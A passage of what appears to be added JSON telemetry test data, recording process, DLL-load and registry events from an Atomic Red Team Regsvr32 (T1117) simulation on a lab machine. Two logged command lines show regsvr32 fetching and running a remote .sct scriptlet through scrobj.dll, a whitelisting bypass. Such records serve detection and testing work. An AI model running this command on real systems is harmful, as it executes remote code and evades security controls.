131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236200016, + "unique_pid": "{00000000-0000-0000-0000-000000000000}" + }, + { + "event_type": "file", + "file_name": "REGSVR32.EXE-55A4EE79.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2652, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573237050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2012, + "ppid": 2652, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "create", + "timestamp": 131883573237130000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", + "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "regsvr32.exe", + "image_path": "C:\\Windows\\System32\\regsvr32.exe", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\System32\\AcLayers.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\System32\\winspool.drv", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\System32\\sfc_os.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "scrobj.dll", + "image_path": "C:\\Windows\\System32\\scrobj.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_value": "ZoneMap", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", + "registry_value": "ProxyBypass", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", + "registry_value": "IntranetName", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", + "registry_value": "UNCAsIntranet", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", + "registry_value": "AutoDetect", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", + "registry_value": "ProxyBypass", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", + "registry_value": "IntranetName", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", + "registry_value": "UNCAsIntranet", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", + "registry_value": "AutoDetect", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2164, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" + }, + { + "event_type": "registry", + "pid": 2164, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" + }, + { + "event_type": "registry", + "pid": 2164, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": 